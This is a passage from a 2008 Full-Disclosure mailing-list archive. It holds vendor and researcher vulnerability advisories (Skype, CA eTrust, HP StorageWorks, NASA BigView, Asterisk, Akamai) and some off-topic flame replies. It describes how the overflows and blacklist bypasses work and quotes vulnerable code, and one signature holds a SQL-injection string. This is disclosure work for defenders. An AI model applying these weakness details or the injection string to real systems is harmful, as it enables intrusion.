06/04/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Tobias Klein.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 06.04.08: Skype File URI Security Bypass Code Execution Vulnerability

2008-06-04 Thread iDefense Labs 
iDefense Security Advisory 06.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 04, 2008

I. BACKGROUND

Skype is a freely available VOIP client that allows access to chat and
video conference with other Skype users and traditional telephone
numbers. More information is available at the vendor's site at the
following URL.

http://www.skype.com/

II. DESCRIPTION

Remote exploitation of a security policy bypass in Skype could allow an
attacker to execute arbitrary code in the context of the user.

The "file:" URI handler in Skype performs checks upon the URL to verify
that the link does not contain certain file extensions related to
executable file formats. If the link is found to contain a blacklisted
file extension, a security warning dialog is shown to the user. The
following file extensions are checked and considered dangerous by
Skype; .ade, .adp, .asd, .bas, .bat, .cab, .chm, .cmd, .com, .cpl,
.crt, .dll, .eml, .exe, .hlp, .hta, .inf, .ins, .isp, .js.

Due to improper logic when performing these checks, it is possible to
bypass the security warning and execute the program. First of all,
checking is performed using a case sensitive comparison. The second
flaw in this check is that the blacklist fails to mention all potential
executable file formats. By using at least one upper case character, or
using an executable file type that is not covered in the list, an
attacker can bypass the security warning.

III. ANALYSIS

Exploitation of this issue allows an attacker to execute arbitrary code
on the targeted user's machine. An attacker would need to persuade a
targeted user to click a "file:" URI pointing to a malicious
executable.

IV. DETECTION

iDefense confirmed version 3.6.0.248 of Skype to be vulnerable. Previous
versions are also suspected to be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this
issue.

VI. VENDOR RESPONSE

Skype has addressed this vulnerability by releasing version 3.8.0.139.
For more information consult their advisory at the following URL.

http://www.skype.com/security/skype-sb-2008-003.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-1805 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/16/2008  Initial vendor notification
05/17/2008  Initial vendor response
06/04/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Ismael Briones
(Inkatel.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-08-035: CA ETrust Secure Content Manager Gateway FTP PASV Stack Overflow Vulnerability

2008-06-04 Thread zdi-disclosures 
ZDI-08-035: CA ETrust Secure Content Manager Gateway FTP PASV Stack 
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-035
June 4, 2008

-- CVE ID:
CVE-2008-2541

-- Affected Vendors:
Computer Associates

-- Affected Products:
Computer Associates eTrust Secure Content Manager

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6168. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Computer Associates eTrust Secure Content
Manager. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the HTTP Gateway service icihttp.exe running
on port 8080. By specifying a overly long response to a PASV command a
stack buffer can be overflowed. Successful exploitation can lead to
complete system compromise under the SYSTEM context.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability. 
More
details can be found at:

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784

-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2008-06-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt ([EMAIL PROTECTED])

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-08-036: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow

2008-06-04 Thread zdi-disclosures 
ZDI-08-036: CA ETrust Secure Content Manager Gateway FTP LIST Stack 
Overflow
http://www.zerodayinitiative.com/advisories/ZDI-08-036
June 4, 2008

-- CVE ID:
CVE-2008-2541

-- Affected Vendors:
Computer Associates

-- Affected Products:
Computer Associates eTrust Secure Content Manager

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Computer Associates eTrust Secure Content
Manager. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the HTTP Gateway service icihttp.exe running
on port 8080. When issuing a request for a FTP service the process tries
to decorate the contents of the transaction. In this particular case by
specifying a overly long response to a LIST command a stack buffer can
be overflowed. Successful exploitation can lead to complete system
compromise under the SYSTEM context.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability. 
More
details can be found at:

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784

-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2008-06-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt ([EMAIL PROTECTED])

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability

2008-06-04 Thread zdi-disclosures 
ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing 
Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-034
June 4, 2008

-- CVE ID:
CVE-2008-1661

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard StorageWorks

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6051. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Hewlett Packard StorageWorks Storage
Mirroring. Authentication is not required to exploit this
vulnerability.

The specific flaw exists in the DoubleTake.exe process bound by default
on TCP ports 1100, 1106 and UDP port 1105. During the handling of an
encoded authentication request, the process copies the user-supplied
login information into a fixed length stack buffer. Sending at least 256
bytes will trigger a stack based buffer overflow due to a vulnerable
processing loop. Exploitation of this issue can result in arbitrary code
execution.

-- Vendor Response:
Hewlett-Packard states:
To resolve this vulnerability download HP StorageWorks Storage Mirroring
software v4.5 Service Pack 2 (SP2) from Double-Take at the following
URL: http://www.doubletake.com/products/double-take/default.aspx

-- Disclosure Timeline:
2007-05-22 - Vulnerability reported to vendor
2008-06-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Titon of BastardLabs

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread Giany 


n3td3v <[EMAIL PROTECTED]> wrote:

The day Zone-H closes shop, the day I party like a mother fo!


The day you stop spamming, the day I`ll be happy! 

   ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread Bardiir 
*sigh* I can't take it anymore...

1. Answering to Spam just makes it worse for the list. Flame the troll on
his mail-address if you feel like, but please take the mailing list out of
the recp. or at least mark the answer as offtopic.
2. Just block [EMAIL PROTECTED] and everything is well...
3. Just let the troll have it's fun, eventually it will get bored someday
and stop spamming.
4. Don't feed the trolls.

Thanks

On Wed, Jun 4, 2008 at 8:15 PM, Giany <[EMAIL PROTECTED]> wrote:

>
>
> *n3td3v <[EMAIL PROTECTED]>* wrote:
>
>
> The day Zone-H closes shop, the day I party like a mother fo!
>
>
> The day you stop spamming, the day I`ll be happy!
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread n3td3v 
On Wed, Jun 4, 2008 at 7:46 PM, Bardiir <[EMAIL PROTECTED]> wrote:
> *sigh* I can't take it anymore...
>
> 1. Answering to Spam just makes it worse for the list. Flame the troll on
> his mail-address if you feel like, but please take the mailing list out of
> the recp. or at least mark the answer as offtopic.
> 2. Just block [EMAIL PROTECTED] and everything is well...
> 3. Just let the troll have it's fun, eventually it will get bored someday
> and stop spamming.
> 4. Don't feed the trolls.
>
> Thanks

I'm not a troll, i'm a serious security researcher.

I was misrepresented in the media by SecurityFocus Robert Lemos who
ruined my image.

The findings have been post,

http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smear-campaign-against-n3td3v.html

All the best,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow

2008-06-04 Thread CORE Security Technologies Advisories 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
  http://www.coresecurity.com/corelabs/

   NASA BigView Stack Buffer Overflow


*Advisory Information*

Title: NASA BigView Stack Buffer Overflow
Advisory ID: CORE-2008-0425
Advisory URL: http://www.coresecurity.com/?action=item&id=2304
Date published: 2008-06-04
Date of last update: 2008-06-03
Vendors contacted: NASA Ames Research Center
Release mode: Coordinated release


*Vulnerability Information*

Class: Stack Overflow
Remotely Exploitable: Yes (client side)
Locally Exploitable: No
Bugtraq ID: 29517   
CVE Name: CVE-2008-2542 


*Vulnerability Description*

NASA BigView [1] allows for interactive panning and zooming of images of
arbitrary size on desktop PCs running Linux. Using this software, one
can explore (on relatively modest machines) images such as the Mars
Orbiter Camera mosaic [92160x33280 pixels].

The BigView package suffers from a stack buffer overflow when parsing
specially crafted (invalid) PNM input files. If successful, a malicious
third party could trigger execution of arbitrary code within the context
of the application, or otherwise crash the whole application. The
vulnerability is caused due to the BigView package not properly checking
the line length of the ascii PNM input files before copying it on a
stack buffer. This can be exploited to get arbitrary code execution by
opening a specially crafted file.

Exploitation of the PNM overflow problem requires the user to explicitly
open a malicious file. The user should refrain from opening files from
untrusted third parties or accessing untrusted Web sites until the patch
is applied.


*Vulnerable Packages*

. BigView revision 1.8.
. Older BigView versions could be affected too, but they were not tested.


*Non-vulnerable Packages*

. Available through BigView website (since June 2nd 2008, see below).


*Vendor Information, Solutions and Workarounds*

The NASA BigView team has published a new version fixing this
vulnerability. The tarball is available on BigView's website:
http://opensource.arc.nasa.gov/project/bigview/


*Credits*

This vulnerability was discovered and researched by Alfredo Ortega, from
CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies.


*Technical Description / Proof of Concept Code*

The BigView package suffers from a stack buffer overflow when parsing
specially crafted (invalid) PNM input files. If successful, a malicious
third party could trigger execution of arbitrary code within the context
of the application, or otherwise crash the whole application.

The vulnerability resides in the following code at 'Ppm/ppm.C'. Here,
the function 'getline()' reads data from a file into a buffer. This is
the complete function:

/---

418 static void getline(int fin, char* lineBuf, int len)
419 {
420   bool done=false;
421   int index=0;
422   lineBuf[index]=' ';
423   while(! done){
424 lineBuf[index] = getOneChar(fin);
425 if( lineBuf[index]==10 ) {
426   lineBuf[index]=0;
427   done=true;
428 }
429 ++index;
430   }
431   lineBuf[index]=0;
432 }

- ---/

Clearly the function requires the length of the destination buffer, but
it is never used internally. This function is used on the
'PPM::ppmHeader()' function, to read the header of the PPM file.

/---

56  PPM::ppmHeader(string filename, PPM::Format* format,
57 int* cpp, int* bpc,
58 int* sizeX, int* sizeY,
59 int* imageOffset)
60  {
61std::ostringstream err;
62char magic[3],lineBuf[512],junk;
63int res,max;
.
.
.
115   while( junk == '#' ){
116 getline(fin,lineBuf,512);
117 cout << "Comment:"

Re: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability

2008-06-04 Thread Luigi Auriemma 
> During the handling of an encoded authentication request, the process
> copies the user-supplied login information into a fixed length stack
> buffer

This one seems exactly the same vulnerability I disclosed in February
2008 and for which I wrote also a testing attack (number 7) in my
doubletakedown proof-of-concept:

  http://aluigi.org/adv/doubletakedown-adv.txt

Anyway it's an old version of Double-Take so should be not considered,
in fact I mentioned that old bug in my advisory only for thoroughness
but without the minimal consideration since the bug was already
found and patched by the same vendor (Double-Take, not HP).


--- 
Luigi Auriemma
http://aluigi.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread Valdis . Kletnieks 
On Wed, 04 Jun 2008 20:29:05 BST, n3td3v said:
 
> I'm not a troll, i'm a serious security researcher.

Which part of "blogger" makes you a "serious researcher"?

http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061251.html



pgpG2EMMOKrhL.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack

2008-06-04 Thread M. Shirk 

I need to go to your site and take one of your other bugs so I can GET PAID!!

:)

Shirkdog
' or 1=1-- 

http://www.shirkdog.us

> Date: Wed, 4 Jun 2008 21:24:46 +0100
> From: [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring 
> Authentication Processing Stack Overflow Vulnerability
> 
> > During the handling of an encoded authentication request, the process
> > copies the user-supplied login information into a fixed length stack
> > buffer
> 
> This one seems exactly the same vulnerability I disclosed in February
> 2008 and for which I wrote also a testing attack (number 7) in my
> doubletakedown proof-of-concept:
> 
>   http://aluigi.org/adv/doubletakedown-adv.txt
> 
> Anyway it's an old version of Double-Take so should be not considered,
> in fact I mentioned that old bug in my advisory only for thoroughness
> but without the minimal consideration since the bug was already
> found and patched by the same vendor (Double-Take, not HP).
> 
> 
> --- 
> Luigi Auriemma
> http://aluigi.org
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_
Instantly invite friends from Facebook and other social networks to join you on 
Windows Live™ Messenger.
https://www.invite2messenger.net/im/?source=TXT_EML_WLH_InviteFriends___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA Secure Content Manager HTTP Gateway Service FTP Request Vulnerabilities

2008-06-04 Thread Williams, James K 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Title: CA Secure Content Manager HTTP Gateway Service FTP Request 
Vulnerabilities


CA Advisory Date: 2008-06-03


Reported By: Sebastian Apelt working with ZDI/TippingPoint
 Cody Pierce, TippingPoint DVLabs


Impact: A remote attacker can cause a denial of service or execute 
arbitrary code.


Summary: CA Secure Content Manager contains multiple 
vulnerabilities in the HTTP Gateway service that can allow a 
remote attacker to cause a denial of service condition or execute 
arbitrary code. CA has issued a patch to address the 
vulnerabilities. The vulnerabilities, CVE-2008-2541, occur due to 
insufficient bounds checking on certain FTP requests. An attacker 
can make a request that will cause the service to fail or allow 
the attacker to take privileged action on the system.


Mitigating Factors: None


Severity: CA has given these vulnerabilities a maximum risk rating 
of High.


Affected Products:
CA Secure Content Manager r8


Affected Platforms:
Windows


Status and Recommendation:

CA has issued the following patch to address the vulnerabilities.

CA Secure Content Manager r8:  QO99987


How to determine if you are affected:

Windows:
1. Using a registry editor, determine if the following key exists:
HKEY_LOCAL_MACHINE\Software\ComputerAssociates\Hidden\PatchID\80VULNHOTFIX
2. If the key does not exist, the installation is vulnerable


Workaround: None


References (URLs may wrap):
CA Support:
http://support.ca.com/
Security Notice for CA Secure Content Manager HTTP Gateway Service
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784
Solution Document Reference APARs:
QO99987
CA Security Response Blog posting:
CA Secure Content Manager HTTP Gateway Service FTP Request 
Vulnerabilities
http://community.ca.com/blogs/casecurityresponseblog/archive/2008/06/04.asp
x
Reported By: 
Sebastian Apelt working with ZDI/TippingPoint
Cody Pierce, TippingPoint DVLabs
CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-036/
CA ETrust Secure Content Manager Gateway FTP PASV Stack Overflow 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-035/
CVE References:
CVE-2008-2541 - CA Secure Content Manager multiple FTP buffer 
overflows
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2541
OSVDB References: Pending
http://osvdb.org/


Changelog for this advisory:
v1.0 - Initial Release


Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form. 
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research


CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2008 CA. All rights reserved.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFIRwHDeSWR3+KUGYURAnaXAJ4pAnPHSzdRNTNnsUkYaAnTE4A3EwCeO+Xu
yWm2EZzO8Qdo3aNVgouIDcs=
=W2lY
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread Anders B Jansson 
n3td3v wrote:
> I'm not a troll, i'm a serious security researcher.
> 
> I was misrepresented in the media by SecurityFocus Robert Lemos who
> ruined my image.

Except that your are not serious, you are not a researcher and you have
not posted anything ever that has shown any clue what so ever about security.

It is possible that you are misrepresented but then you are misrepresented
by your own moronic rants.
-- 
// hdw

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] AST-2008-009: (Corrected subject) Remote crash vulnerability in ooh323 channel driver

2008-06-04 Thread Asterisk Security Team 
   Asterisk Project Security Advisory - AST-2008-009

   ++
   |  Product   | Asterisk-Addons   |
   |+---|
   |  Summary   | Remote crash vulnerability in ooh323 channel  |
   || driver|
   |+---|
   | Nature of Advisory | Remote crash  |
   |+---|
   |   Susceptibility   | Remote unauthenticated sessions   |
   |+---|
   |  Severity  | Major |
   |+---|
   |   Exploits Known   | No|
   |+---|
   |Reported On | May 29, 2008  |
   |+---|
   |Reported By | Tzafrir Cohen   |
   |+---|
   | Posted On  | June 4, 2008  |
   |+---|
   |  Last Updated On   | June 4, 2008  |
   |+---|
   |  Advisory Contact  | Mark Michelson  |
   |+---|
   |  CVE Name  | CVE-2008-2543 |
   ++

   ++
   | Description | The ooh323 channel driver provided in Asterisk Addons|
   | | used a TCP connection to pass commands internally. The   |
   | | payload of these packets included addresses of memory|
   | | which were to be freed after the command was processed.  |
   | | By sending arbitrary data to the listening TCP socket,   |
   | | one could cause an almost certain crash since the|
   | | command handler would attempt to free invalid memory.|
   | | This problem was made worse by the fact that the |
   | | listening TCP socket was bound to whatever IP address|
   | | was specified by the "bindaddr" option in ooh323.conf|
   ++

   ++
   | Resolution | The TCP connection used by ooh323 has been replaced with  |
   || a pipe. The effect of this change is that data from   |
   || outside the ooh323 process may not be injected.   |
   ++

   ++
   |   Affected Versions|
   ||
   | Product  |   Release   |   |
   |  |   Series|   |
   |--+-+---|
   |   Asterisk Open Source   |1.0.x| N/A   |
   |--+-+---|
   |   Asterisk Open Source   |1.2.x| N/A   |
   |--+-+---|
   |   Asterisk Open Source   |1.4.x| N/A   |
   |--+-+---|
   | Asterisk Addons  |1.2.x| All versions prior to |
   |  | | 1.2.9 |
   |--+-+---|
   | Asterisk Addons  |1.4.x| All versions prior to |
   |  | | 1.4.7 |
   |--+-+---|
   |Asterisk Business Edition |A.x.x| N/A   |
   |--+-+---|
   |Asterisk Business Edition

[Full-disclosure] AST-2008-009: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised

2008-06-04 Thread Asterisk Security Team 
   Asterisk Project Security Advisory - AST-2008-009

   ++
   |  Product   | Asterisk-Addons   |
   |+---|
   |  Summary   | Remote crash vulnerability in ooh323 channel  |
   || driver|
   |+---|
   | Nature of Advisory | Remote crash  |
   |+---|
   |   Susceptibility   | Remote unauthenticated sessions   |
   |+---|
   |  Severity  | Major |
   |+---|
   |   Exploits Known   | No|
   |+---|
   |Reported On | May 29, 2008  |
   |+---|
   |Reported By | Tzafrir Cohen   |
   |+---|
   | Posted On  | June 4, 2008  |
   |+---|
   |  Last Updated On   | June 4, 2008  |
   |+---|
   |  Advisory Contact  | Mark Michelson  |
   |+---|
   |  CVE Name  | CVE-2008-2543 |
   ++

   ++
   | Description | The ooh323 channel driver provided in Asterisk Addons|
   | | used a TCP connection to pass commands internally. The   |
   | | payload of these packets included addresses of memory|
   | | which were to be freed after the command was processed.  |
   | | By sending arbitrary data to the listening TCP socket,   |
   | | one could cause an almost certain crash since the|
   | | command handler would attempt to free invalid memory.|
   | | This problem was made worse by the fact that the |
   | | listening TCP socket was bound to whatever IP address|
   | | was specified by the "bindaddr" option in ooh323.conf|
   ++

   ++
   | Resolution | The TCP connection used by ooh323 has been replaced with  |
   || a pipe. The effect of this change is that data from   |
   || outside the ooh323 process may not be injected.   |
   ++

   ++
   |   Affected Versions|
   ||
   | Product  |   Release   |   |
   |  |   Series|   |
   |--+-+---|
   |   Asterisk Open Source   |1.0.x| N/A   |
   |--+-+---|
   |   Asterisk Open Source   |1.2.x| N/A   |
   |--+-+---|
   |   Asterisk Open Source   |1.4.x| N/A   |
   |--+-+---|
   | Asterisk Addons  |1.2.x| All versions prior to |
   |  | | 1.2.9 |
   |--+-+---|
   | Asterisk Addons  |1.4.x| All versions prior to |
   |  | | 1.4.7 |
   |--+-+---|
   |Asterisk Business Edition |A.x.x| N/A   |
   |--+-+---|
   |Asterisk Business Edition

[Full-disclosure] TPTI-08-05: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Vulnerability

2008-06-04 Thread DVLabs 
TPTI-08-05: CA ETrust Secure Content Manager Gateway FTP LIST Stack  
Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-08-05
June 4, 2008

-- CVE ID:
CVE-2008-2541

-- Affected Vendors:
Computer Associates

-- Affected Products:
Computer Associates eTrust Secure Content Manager

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Computer Associates eTrust SCM.
Authentication is not required to exploit this vulnerability.

The specific flaw exists in the HTTP Gateway service icihttp.exe running
on port 8080.  When issuing a request for a FTP service the process
tries to decorate the contents of the transaction.  In this particular
case by specifying a overly long response to a LIST command a stack
buffer can be overflowed.  Successful exploitation can lead to complete
system compromise under the SYSTEM context.

-- Vendor Response:
Computer Associates has issued an update to correct this  
vulnerability. More
details can be found at:

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784

-- Disclosure Timeline:
2008-05-19 - Vulnerability reported to vendor
2008-06-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
 * Cody Pierce, TippingPoint DVLabs

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Akamai Download Manager File Downloaded To Arbitrary Location Vulnerability

2008-06-04 Thread cocoruder 
Akamai Download Manager File Downloaded To Arbitrary Location Vulnerability

by cocoruder([EMAIL PROTECTED])
http://ruder.cdut.net


Summary:

A parameter injection vulnerability exists in Akamai Download
Manager. By exploiting this vulnerability, the remote attacker can
make the users to download arbitrary file, and save it to arbitrary
location while they are visiting a vicious web page. It means an
attacker who successfully exploits this vulnerability can run
arbitrary code on the affected system.


Affected Software Versions:

